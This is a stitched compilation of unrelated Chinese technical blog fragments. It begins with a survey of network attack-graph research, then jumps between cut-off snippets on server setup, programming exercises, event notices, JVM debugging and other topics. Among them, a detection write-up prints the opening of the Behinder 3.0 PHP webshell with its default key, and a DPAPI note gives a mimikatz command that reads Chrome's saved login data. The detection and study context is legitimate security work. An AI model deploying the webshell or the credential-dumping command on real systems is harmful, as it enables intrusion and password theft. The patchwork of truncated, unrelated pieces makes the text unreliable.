作为当前网络安全领域的研究热点之一,网络脆弱性评价不同于其他一般的性能评价技术。例如,入侵检测、防火墙和病毒扫描等技术都是在攻击进行时发生或发生后的被动检测,而网络脆弱性评价是由黑客攻击和防范技术发展而来的,是一种在攻击发生前的主动探测。因此在对网络脆弱性进行评价时,针对攻击行为构建安全模型是一个关键步骤。另一方面,根据安全模型可以获得系统可能的行为和状态,以此为基础展开进一步的分析和计算,为完善系统安全策略提供帮助。而攻击图是网络脆弱性评价的重要手段。
本文综合论述计算机网络攻击建模的研究概况,剖析网络攻击图的定义,讨论现有的网络攻击图的主要生成方法,归纳总结目前网络攻击图的应有,最后给出网络攻击图研究的若干热点问题及展望。
网络中总是存在一定的安全漏洞,同时这些漏洞之间可能存在一定的关联关系,即当一个漏洞被成功利用后,可能为另一漏洞的利用创造有利条件。虽然说消除所有的漏洞是不切实际的,但在网络环境中对遗留的漏洞置之不理,可能会对关键资源造成重大危害。为了能够彻底找出所有关联关系,最有效的方法就是通过模拟攻击者对存在安全漏洞的网络攻击过程,找到所有能够到达目标的攻击路径,同时将这些路径以图的形式表现,这种图就是网络攻击图,简称攻击图。
与攻击树和Petri网相比,攻击图对网络攻击过程的描述能力更强,应用范围也更加广泛。
攻击图是一种基于模型的网络脆弱性评估方法。攻击图技术能够把网络中各主机上的脆弱性关联起来进行深入地分析,发现威胁网络安全的攻击路径并用图的方式展现出来。安全管理人员利用攻击图可以直观地观察到网络中各脆弱性之间的关系,选择最小的代价对网络脆弱性进行弥补。攻击图技术主要有两个方面:
目前,计算机网络已然构成了诸多信息技术基础设施的核心组成部分,这些设施包括电网、金融数据系统和应急通信系统领域等。及时发现和消除计算机网络系统中存在的安全隐患,杜绝恶意的攻击行为,是网络安全管理的一项重要的任务。我们常常能够在被利用来攻击这些系统的软件/应用中发现脆弱性,而攻击者就是利用这些被公布或者没有被公布的脆弱性方才得以实施攻击。
但是就目前而言,组织网络的安全风险管理与其说是科学,不如说是一门艺术。系统管理员通过直觉和丰富的经验来操作,而不是依靠客观指标来指导和证明决策的制订。
攻击图技术旨在用于解决此类场景的问题,其包括
为了提高组织网络的安全性,提出了基于攻击图的网络安全评估方法,测量由不同网络配置提供的安全性。随着大数据网络的发展,网络攻击手段呈现出多样化与复杂化,网络安全分析的要求也是越来越高,而网络攻击图作为分析网络状况的一个重要方法,对防止网络攻击,实施网络安全防护有一定的现实指导意义。
攻击图研究的目的是开发一个标准模型,用于测量计算机网络的安全性。标准模型将使我们能够回答诸如“我们比昨天更安全吗?”或“一个网络配置的安全性如何与另一个进行比较?”这样的问题。另外,有一个标准模型来衡量网络安全可以使用户,软件供应商和研究人员能够一起评估网络安全的方法和产品。
对于组织来说,网络的安全风险分析主要有如下挑战:
良好的评价指标应当具有如下性质:
攻击图技术通过捕获漏洞之间的相关性,并以实际攻击者渗透网络的方式来测量安全性,从而应对这一挑战。通过网络分析所有攻击路径,提供整体系统的风险指标。通过这个指标,可以分析安全成本和安全利益之间的权衡。因此,决策者可以避免过度投资无法产生实际效果的安全措施,或避免投资和风险造成毁灭性后果。攻击图技术的度量是一致、明确的,并为理解计算机网络的安全风险提供了上下文。
攻击图是由Cuningham等人于1985年提出,他们认为是由各种通过物理的或者逻辑的方法相互相连的组件构成。典型的网络攻击图由节点和连接节点的有向边组成。其中节点表示网络所处的状态,节点间的有向边表示网络状态间的转移关系。
为了生成攻击图,首先需要对网络建模、建模过程中需要大量关于网络中的与安全相关的信息,如主机配置信息、主机漏洞信息、网络拓扑信息、网络配置信息等。在生成网络攻击图的过程中,需要应用相关漏洞库的知识确定网络中存在的各个漏洞之间的关系。
网络建模与攻击图生成需要充分考虑所生成的攻击图的最终应用,
因此,攻击图的最终应用在一定程度上决定了需要建立的模型与生成方法。
目前攻击图生成方法很多,为了便于对这些方法进行分析、比较及评价其优劣,需要对攻击图生成机制进行分析,找出可以用于对其分析比较的属性,并对生成方法进行分类,找出存在的问题,发现可能的研究发现。
典型的模型逻辑工具有:MulVAL和麻省理工学院实现的NetSPA系统。
2005年Ou等人提出了MulVAL。MulVAL具有强大的网络数据采集能力和性能优势。在研究中,实验者描述了一种基于Datelog的网络安全分析器。脆弱性数据库中的信息、每台主机的配置信息和其他的一些相关信息都能通过程序的加工处理编码成为Datelog中的事实,从而供推理引擎分析,计算出网络中各种组件之间的交互。MulVAL最后生成的逻辑攻击图(Logical Attack Graph)的规模随着网络规模大小的变化为O(n2)
2006年,麻省理工学院提出NetSPA(网络安全计划架构)。在实验中,实验者使用攻击图来模拟对手和简单反制措施的效果。它使用防火墙规则和网络漏洞扫描工具创建组织网络的模型。然后,它使用该模型来计算网络可达性和多先决条件攻击图(Multiple-Prerequisite Attack Graph),以表示对手利用已知的漏洞发起攻击的潜在路径。这会发现所有攻击者从一个或多个位置开始并最终能够入侵的主机。
NetSPA生成的攻击图规模通常随着典型网络中主机数量的增加而缩放为O(nlogn)。它解决了以往攻击图研究中的网络数据自动采集问题和攻击图生成算法扩展性的问题,定义了更为简单的网络模型,方便系统自动采集网络数据。而通过测量攻击者可以攻陷的总资产(数量、价值),可以评估不同攻击者的风险。
虽然方法不同,但是这两种攻击图生成方法从效率和能力上来说的差距其实是不大的,事实上,在近年的攻击图研究发展中,有关攻击图生成方向的研究不再主要以尝试发明新的攻击图元模型,而是更多的集中于研究如何提高攻击图的生成效率。
攻击图元模型和攻击图生成技术其实都仅仅是将组织网络、脆弱性、攻击模式等安全相关信息使用建模的方式进行表示,并且关联了起来。虽然更加直观的展示组织网络中存在的各类信息以及他们的之间的关系,但是么有提供任何评估、分析方面的内容,而这就是攻击图分析技术研究所进行的工作。
对于攻击图的分析主要是基于贝叶斯理论进行的,NayotPoolsappasit、RinkuDewri、Indrajit Ray(IEEE机构成员)提出了一个使用贝叶斯网络的风险管理框架,使系统管理员可以量化各个级别的网络陷落概率。
他们认为,安全风险评估和缓解技术是维持高效IT的两个重要过程基础设施。
然而,这些风险模型并不能帮助网络之间因果关系的原因状态,由此,他们提出使用贝叶斯网络的风险管理框架,使系统管理员能够量化机会各级网络陷落。他们展示如何使用这些信息来制定安全缓解和管理计划。在与其他类似模型形成对照,该风险模型适用于网络部署阶段的动态分析。
Cauldron的作者Noel S.和Jajodia S.在2014年一篇文献中对攻击图度量的指标进行了分簇,如下图所示:
基于这样的一些安全度量指标,我们就能够对整个组织网络的安全态势,给出基本的判断——“一个网络到底有多安全?”
除开单纯数值上的分析,我们还可以对图结构进行更多的分析,其中最为主要的就是攻击面分析。攻击面分析的本质在于求解所有攻击路径,直观展示攻击者可以采用的攻击路线,便于后续对这些攻击路线的深层分析。
下图为一个典型的路径分析结果展示:
攻击图是种非常重要的工具,已广泛应用于网络安全分析与评估的研究。从安全生命周期PDR(防护、检测、响应)来看,可以应用于网络安全设计、网络安全与漏洞管理、入侵检测系统、入侵响应等。从应用领域来说,不仅应用于普通的互联网络,还可以应用于无线网络、工业控制网络,特别是电力网络以及对网络依赖性非常高的其他行业或领域。从应用角度来说,网络攻击图可以应用于网络渗透测试、网络安全防御、网络攻击模拟仿真等。
攻击路径预测的目的是通过告警关联分析技术分析攻击行为,揭露这些攻击行为背后隐藏的逻辑,进而构建攻击场景,最终推断出攻击者的后续攻击步骤,实现及时发现主动防御。
攻击路径预测的关键主要分为两部分:
了解当前的攻击行为
预测攻击者可能会采用的攻击路径
在构建网络攻击节点路径检测模型的过程中,首先基于攻击图理论定义了网络攻击图,通过检测攻击者在当前时间节点的权限状态,获取网络连接矩阵,得到攻击者使用的漏洞、攻击效果和攻击条件的描述,进而构建网络攻击节点路径检测模型。
在优化和预测网络中异常信息的攻击意图的过程中,根据主机之间的连接关系定义攻击路径图,计算攻击意图的可达性和实现的可能性,得到攻击意图的最短路径,进而优化和预测网络中异常信息的攻击意图
在构建网络攻击节点路径检测模型的过程中,根据预定义的攻击标准,对网络中存在的漏洞的各个属性进行赋值,检测攻击者能够成功利用漏洞进行入侵的概率、攻击者获得高权限的概率以及实现攻击意图的概率,最后得攻击者在网络中各个攻击路径下能够进行入侵的最大可能性的那一条攻击路径,进行后续检测(这部分是建立在网络攻击节点路径检测的基础上实现的)。
现有攻击面管理产品存在几个痛点问题
基于运行时检测告警,进行反向的攻击路径分析,带来几个主要的优势
核心关注点:
参考链接:
http://www.sohu.com/a/156772659_822985 http://www.secrss.com/articles/36058 http://www.quest.com/cn-zh/products/attack-path-management-software/ http://www.4hou.com/posts/VnY5 http://www.cnblogs.com/LittleHann/p/16798395.html http://www.cnblogs.com/mq-maqi/p/16426232.html
一、系统约定软件源代码包存放位置/usr/local/src源码包编译安装位置(prefix)/usr/local/software_name脚本以及维护程序存放位置/usr/local/sbinMySQL数据库位置/var/lib/mysql(可按情况设置)Nginx网站根目录/home/www/wwwroot(可按情况设置)Nginx虚拟主机日志根目录/home/www/logs(可按情况设置)Nginx运行账户www:www二、系统环境初始化1.检查系统是否正常#more/var/log/messages(检查有无系统级错误信息)#dmesg(检查硬件设备是否有错误信息)#cat/proc/cpuinfo(检查CPU频率是否正常)#top(按1检测CPU核数是否正常,内存大小是否正常)#ifconfig(检查网卡设置是否正确)#pingwww.linuxidc.com(检查网络是否正常)2.关闭不需要的服务#ntsysv以下仅列出需要启动的服务,未列出的服务一律推荐关闭:atdcrondirqbalancemicrocode_ctlnetworksendmailsshdsyslo
请编写函数,将大写字母写入文件中。函数原型 voidWriteLetter(FILE*f,intn); 说明:参数f为文件指针,n为字母数目(1≤n≤26)。函数将前n个大写英文字母写入f所指示的文件中。裁判程序 #include #includevoidWriteLetter(FILE*f,intn);intmain() { FILE*f; intn; f=fopen(“Letter.txt”,“w”); if(!f) { puts(“文件无法打开!”); exit(1); }scanf("%d",&n); WriteLetter(f,n); if(fclose(f)) { puts("文件无法关闭!"); exit(1); } puts("文件保存成功!"); return0;复制}/*你提交的代码将被嵌在这里*/ 样例输入 3 输出样例 文件保存成功! 打开“Letter.txt”文件,查看文件内容:Letter.txtABCvoidWriteLetter(FILE*f,intn){ charch='
2021腾讯数字生态大会终于来了,作为腾讯面向产业互联网领域的年度盛会,将汇聚全球智慧,开启一场数字技术与产业智慧的融合思辨。其中智能教育专场也正式定档,8月18日14:00,邀您云端相约!此次2021腾讯数字生态大会智能教育专场将以“深耕·生长”为主题,与来自教育管理部门、学校和行业的专家学者共同展望教育与科技融合发展的广阔空间,共同探讨产教融合与协同育人新模式,共同见证和推动以学习者为中心的教育行业新生长。 与此同时,教育专场将全新升级腾讯产业互联网学堂品牌,并发布腾讯教育教培易解决方案、创新学习平台、智慧教学解决方案、腾讯云企业直播等多个战略产品,深耕教育领域,以科技助力教学“新生长”。目前,智能教育专场线上直播预约通道已开启,点击上方二维码,立即预约直播!更多专场精彩资讯,请持续关注。END
作者:腾讯在线教育技术团队 导语| 腾讯在线教育部后台中心团队,作为在线教育行业的从业者,尝试整理一下2020年后端技术要点,以此窥探后台未来技术的发展趋势: ①云计算进程提速,一切皆服务。 ②云上安全越来越受到企业的重视。 ③从资源云向业务云化转变,最终全面云原生化。 ④微服务、DDD、中台技术并非企业技术架构设计的银弹。 ⑤Python、Go、Rust成为后端未来最先考虑学习编程语言。 ⑥Go语言生态发展稳健,越来越多企业在生产中使用Go语言落地业务。 ⑦疫情催化在线教育行业产品升级转型,音视频技术不断迭代升级。 上篇已对前四个趋势进行了展开介绍,本文将详细阐述后三个。点击查看上篇:2021下半年有哪些不能错过的技术趋势?(上)05DevOps2020年,在云原生的浪潮下,devops相关的技术栈也在稳步地向前演进,下面将从以下几个方面分别进行阐述:敏捷的应用交付流程监控告警系统tracing系统云原生对提升devops的展望1.敏捷的应用交付流程业内趋势当前出现了一系列的基于Kubernetes的CI/CD工具,如Jenkins-x、Gitkube,它提供了从代码提交
希望这篇文章可以真正帮助那些被打穿的单位识别与溯源。 phpshell与冰蝎2.0在建立连接时随机生成AES密钥同时明文交换不同是,冰蝎3.0的AES密钥为连接密码32位md5值的前16位,默认连接密码rebeyond。该方法保证了全密文传输,但是依然具有一定的特点。特征:连接content-length=5464or5484(占比较多) 基于AES加密和base64编码,解密时通过对shell.php内容的截获获取密钥,具体操作如下所示: 以下为冰蝎3.0webshell<?php @error_reporting(0); session_start(); $key="e45e329feb5d925b";//该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond $_SESSION['k']=$key; $post=file_get_contents("php://input"); if(!extension_loaded('openssl')) { $t="b
Log.d()方法内需要传入两个参数。1.第一个参数时tag,一般传入类名,用于对打印信息进行过滤;2.第二个参数,是一个字符串类型的msg,表示你想要打印的内容。输出Log.d()语句的快捷键为:logd+tab键在我们每写一条Log.d()语句时,就要传入一次tag参数,而每一次的tag参数值基本是一样的,这样就会很麻烦,其实只要我们在类中创建一个字符串类型的变量TAG,那么在我们每次写log.d()语句的时候,系统就会自动将该TAG的值传入tag参数中自动生成一个以当前类名作为值的常量TAG的快捷键:logt+tab键如下图:在完成上述代码后,执行下图述操作:在点击EditFilterConfiguration后会弹出一个过滤器适配界面,然后填写好过滤器名称,标签值,选择日志级别。如下图:运行该项目,就可以看到模拟器中运行出来布局界面,分别单击两个Button,在logcat中就可以看到打印出来的日志信息。如下图:补充知识:androidstudio无法运行–app显示红叉或者显示灰色的问号有的时候当关闭androidstudio的,到第二天打开的时候,就会发现自己原本的项目运行
前言记录一次线上JVM堆外内存泄漏问题的排查过程与思路,其中夹带一些JVM内存分配机制以及常用的JVM问题排查指令和工具分享,希望对大家有所帮助。在整个排查过程中,我也走了不少弯路,但是在文章中我仍然会把完整的思路和想法写出来,当做一次经验教训,给后人参考,文章最后也总结了下内存泄漏问题快速排查的几个原则。本文的主要内容:故障描述和排查过程故障原因和解决方案分析JVM堆内内存和堆外内存分配原理常用的进程内存泄漏排查指令和工具介绍和使用文章撰写不易,请大家多多支持我的原创技术公众号:后端技术漫谈故障描述8月12日中午午休时间,我们商业服务收到告警,服务进程占用容器的物理内存(16G)超过了80%的阈值,并且还在不断上升。监控系统调出图表查看:像是Java进程发生了内存泄漏,而我们堆内存的限制是4G,这种大于4G快要吃满内存应该是JVM堆外内存泄漏。确认了下当时服务进程的启动配置:-Xms4g-Xmx4g-Xmn2g-Xss1024K-XX:PermSize=256m-XX:MaxPermSize=512m-XX:ParallelGCThreads=20-XX:+UseConcMarkSw
第001节_I2C协议与EEPROMI2C协议I2C在硬件上的接法如下(图19-1)所示,主控芯片引出两条线SCL,SDA线,在一条I2C总线上可以接很多I2C设备,我们还会放一个上拉电阻(放一个上拉电阻的原因以后我们再说)。我们怎么传输数据,我们需要发数据从主设备发送到从设备上去,也需要把数据从从设备传送到主设备上去,数据涉及到双向传输。举个例子:体育老师:可以把球发给学生,也可以把球从学生中接过来。1.发球:a.老师说:注意了(start) b.老师对A学生说我要球发给你(地址)。 ::c.老师就把球发出去了(传输)。 ::d.A收到球之后,应该告诉老师一声(回应)。 ::e.老师说下课(停止)2.接球: ::a.老师说注意了(start), ::b.老师说:B把球发给我(地址) ::c.B就把球发给老师(传输) ::d.老师收到球之后,给B说一声,表示收到球了(回应)。 ::e.老师说下课(停止)我们就使用这个简单的例子,来解释一下IIC的传输协议。 *老师说注意了,表示开始信号(start) *老师告诉某个学生,表示发送地址(address) *老师发球/接球,表示数据的传输
最近看了些web安全方面的文章,略有心得,写这篇文章来整理下思路,如有错误,恳请斧正SQL注入原理:在web表单中输入恶意sql语句防御:对用户输入的进行处理,永远不要相信前端js对表单的验证,js是可以禁用的主要方法:使用框架自带方法(此类方法较为简便,因为大部分框架都为你做好了处理)比如常用的tp框架可以使用数组查询条件,字符串查询预处理机制使用PDO或mysqli预处理(此类方法较为繁琐,但是有些框架没有做安全处理或做的不好)以下是PDO的示例(mysqli本人也没试过,只是听说可以(逃~)$dbh=newPDO("mysql:dbname=test;host=127.0.0.1;charset=utf8","user","pass");//连接数据库,并设置本地PDO驱动编码格式$dbh->setAttribute(PDO::ATTR_EMULATE_PREPARES,false);//禁用模拟预处理(非常重要)$dbh->exec("setnames'utf8'")
数据猿导读4月28日,以“太湖连浪潮,合作赢未来”为主题的2017中国·无锡大数据产业发展论坛在无锡召开。中堃数据与浪潮集团签订战略合作协议并加入“感知中国”大数据产业联盟加速大数据产业发展。视频内容4月28日,以“太湖连浪潮,合作赢未来”为主题的2017中国·无锡大数据产业发展论坛在无锡召开。无锡市市长汪泉,浪潮集团董事长兼CEO孙丕恕,江苏中堃数据技术有限公司CEO魏清等出席论坛,并共同见证“‘感知中国’大数据产业联盟行动计划”启动。无锡市政协副主席丁旭初宣布本次论坛活动开幕。 在论坛上,浪潮集团董事长兼CEO孙丕恕进行了主题为《迈向数据社会化》的演讲。他在演讲中表示,当前我们正处于“数据化”迈向“数据社会化”的进程中,计算和云是数据社会化的承载环境,数据是实现数据社会化的关键所在,数据流通是数据社会化的核心,人工智能是数据社会化的重要体现。随后在沙发论坛环节,中堃数据CEO魏清作为特邀嘉宾与太湖新城发展集团总裁唐劲松、浪潮集团数据服务事业部总经理徐宏伟、江南大学数学媒体学院院长刘渊、无锡信息化协会会长谢生勃,一起进行了亲切座谈。魏清以“大数据为市民百姓生活会带来哪些影响?”为主题
大家好,又见面了,我是你们的朋友全栈君。为了使爬虫代码更加扁平化,因此,我对2.0版本爬虫进行了一定的修改。话不多说,请看代码。#导入库 importos,time,requests #请求头 headers={ 'User-Agent':'Chrome10.0' } #图片数据列表 pictures=[] #获取图片数据 defget_pic(url,nums): fornuminrange(0,int(nums)): url_all=str(url)+f'{str(num)}.jpg' res=requests.get(url=url_all,headers=headers) pic_content=res.content pictures.append(pic_content) time.sleep(0.5) #创建目的文件夹 defget_path(path_name): ifnotos.path.exists(f'C:/Users/liu/Desktop/图集/{path_name}'):
.netCore部署到在CentOS7下后,验证码打不开,报Thetypeinitializerfor'Gdip'threwanexception.异常 运行含图片处理时发生异常: Thetypeinitializerfor'Gdip'threwanexception. 复制 问题分析: 验证码一般我们是通过System.Drawing.Common组件提供对GDI+图形功能的访问来实现。它是依赖于GDI+的,在windows平台下没有任何问题,本身就已经支持,Linux上没有GDI+,那么在Linux上如何使用GDI+呢?Mono团队使用C语言实现了GDI+接口,提供对非Windows系统的GDI+接口访问能力(实质就是模拟GDI+,与系统图像接口对接),这个就是libgdiplus。 解决办法: 一、安装一下包: yum-yinstallautoconfautomakelibtool yum-yinstallfreetype-develfontconfiglibXft-devel yum-yinstalllibjpeg-turbo-devellibpng-develgiflib-
前言:学习DPAPI的笔记 参考文章:https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++ DPAPI简介 除了用户密码登录到Windows,如下列表中的密码都存储在操作系统上,可以看到有IE浏览器的密码vpn密码谷歌浏览器密码等等... 知识点: DPAPI被使用作为一个数据保护应用程序接口 每个用户都会有相关的Masterkey(不止一个) 如果需要对某些数据进行加密或加密需要DPAPI提供的加密解密函数 对服务器密码(rdp凭证)的解密也需要用到Masterkey 简单的GoogleChrome浏览器解密测试 dpapi::chrome/in:"%localappdata%\Google\Chrome\UserData\Default\LoginData" 可以发现此时提示:ERRORkuhl_m_dpapi_chrome_decrypt;No
本文将使用库技术来读写横河PLC数据,使用的是基于横河自身协议实现,不需要额外的组件,读取操作只要放到后台线程就不会卡死线程,本组件支持超级方便的高性能读写操作 github地址:https://github.com/dathlin/HslCommunication 如果喜欢可以star或是fork,还可以打赏支持,打赏请认准源代码项目。 联系作者及加群方式:http://www.hslcommunication.cn/Cooperation 在VisualStudio中的NuGet管理器中可以下载安装,也可以直接在NuGet控制台输入下面的指令安装: Install-PackageHslCommunication 复制 如果需要教程:Nuget安装教程:http://www.cnblogs.com/dathlin/p/7705014.html 组件的完整信息和API介绍参照: http://api.hslcommunication.cn 组件的使用限制,更新日志,都在该页面里面。
华夏一侠:我楼下有一个中国妇女,三十多岁,每周五到楼下拖垃圾桶,我们偶尔会碰到,聊上两句。因为年龄相差较大,我认为她对我说过的话是没有保留的。她总是说很羡慕我们年轻一代的留学生,开好车,租着周金200的房子。我说不是人人都这样,我是留学生中20%的那一批。她说,本质上还是不同的,现在的留学生,尤其是来念高中,语言的,经济上要比她们那一代的好很多。 当初她之所以嫁了个老外,多少还是有一点自私的。绿卡、汽车、房子。可是今天看来,她的生活是很不如意的。虽然时下也有很多中国女孩子和老外在一起,但可以说,不那么功利了,很多是为了图个新鲜。但一谈到婚姻,就不一样了。我问过我们的老外同学:你们怎么看中外的婚姻?他们说:“SOMEISLOVE,SOMEISBULLSHIT。”一位鬼妹更是说:那怎么可能,他们连调情都不行!言外之意:找中国女人的大体也是个LOSER了。 我那位楼下的邻居刚来国外时有个中国男友,叫杨晓,可杨晓没有绿卡,没有车,没房子,后来杨晓回国了。当五年后她和鬼佬回国探亲时,见过一回面。杨晓开着大奔把他们从没星级的破旅馆送到当地最好的四星级酒店时,她说:“她不后悔,她没脸再后悔了。”在国
一、排序&去重分析 row_number()over(partititonbycol1orderbycol2)asrn 结果:1,2,3,4 rank()over(partititonbycol1orderbycol2)asrk 结果:1,2,2,4,5 dense_rank()over(partititonbycol1orderbycol2)asds_rk 结果:1,2,2,3,4 select order_id, departure_date, row_number()over(partitionbyorder_idorderbydeparture_date)asrn,--直排 rank()over(partitionbyorder_idorderbydeparture_date)asrk,--并列的,下一个数字会跳过 dense_rank()over(partitionbyorder_idorderbydeparture_date)asd_rk--并列的,下一个数据不会跳过 fromord_test whereorder_id=410341346 ;复制
以下只是一家之言: 分布式限流和单机限流在本质上没有太多区别,只不过依赖的数据结构和数据要放在类似redis这种支持分布式存储的存储容器上 redis本身单线程对于办法请求的安全性,和基于内存和CPU的高效性使得他成为分布式存储容器的不二之选 1.单窗口限流 即是简单的按时间单位计数,时间单位过完之后计数归零。比如说时间单位是1秒钟,并且限制这一秒钟里的请求次数最多是100次,也就是100QPS 那么在这一秒里,如果请求数超过100,多出的请求将被抛弃。 但是实际上,比如在3分58秒,如果100个请求都在58秒的最后的1ms发给服务器,然后在3分59秒的前1ms又要100个请求发给服务器,这些请求都是在允许范围之内的,实际上,58秒前半秒和59秒后半秒这一秒里就有200次请求打向服务器并且被接受,和预期的100QPS限制不同。 2.粒度减小:滑动窗口限流(多窗口法),假设将1秒分成5份,并且每秒最多接受500次请求 做法是用一个N大小的数组,实现滑动窗口,每个位置代表200ms(1s/5),每个格子中的元素代表该200ms中请求的处理次数 当co
<!--html部分--> <!doctypehtml><html><head><metacharset="utf-8"><scripttype="text/javascript"src="demo.js"></script><title></title></head><body>字数限制:<inputtype="text"name="remainingCharacters"data-length="5"id='remainingCharacters'data-model='Ch'><h2>对文本内容进行关键字过滤</h2><textareaname=""id="keyWordsFiltering"cols="50"rows="10"> 关键字过滤:你好这里是关键字过滤部分,以下是将要被过滤的文字,傻瓜,美女,贪色,这些字会被"*"给代替,那接下来的文字也会进行过滤比如说,游戏外挂,把你的密码账发过来!!&l
关于下载: 1.官网地址:https://dev.mysql.com/downloads/mysql/ 2.网盘地址:https://pan.baidu.com/s/13Q_9MwCNCy_co7z9sgdrag 提取码:0dzn 3. 中科大镜像:http://mirrors.ustc.edu.cn/mysql-ftp/Downloads/MySQL-8.0/ 4.搜狐镜像:http://mirrors.sohu.com/mysql/MySQL-8.0/ 关于安装: 如果下载的社区版,在安装时会引导配置路径、端口、服务名、账户等,然后接着配置系统变量,启动服务就可以。 参考:https://blog.csdn.net/Uniga/article/details/107370879 如果下载的是服务版或者解压版,安装过程不会出现配置的相关界面,保持默认,直接下一步即可。默认安装路径C:\ProgramFiles\MySQL\ 1.使用管理员身份打开命令行工具,进入到mys
Spotify(声田)是全球最大的流音乐服务商,因其新型的敏捷矩阵组织而备受敏捷人的关注,很多人对它的敏捷组织形式和敏捷教练非常感兴趣,今天就来看看Spotify敏捷教练的工作重点是什么? 我们敏捷社区收到的一个常见问题就是“Spotify的敏捷教练具体是在做什么”,约2年前,JoakimSundén在他的博客中回答了这个问题。他给我们展示了Spotify的敏捷教练的实际工作情况。 四个月前,我离开了IO部门(基础架构运营),加入了刚成立六个月的BITS部门(商业信息技术系统)。我作为部门第一个敏捷教练(当然我们正在招聘),面临着管理、策略和交付方面的挑战,不过万事开头难嘛。 在我加入BITS(2014年10月的最后一周),我的时间是像下面这样分配的。 本图中的策略是指与系统(团队和组织)持续改进相关的一切。一些是职业发展,招聘,我们应该怎么可视化工作,限制组织中的WIP,并提高领导团队的决策能力。 人员是指与了解人员,建立信任和关系,以及指导和指导个人相关的所有活动。 交付是指与项目和日常业务相关的所有内容,包括站会,计划会议等。 5周后,我的注意力转移了,把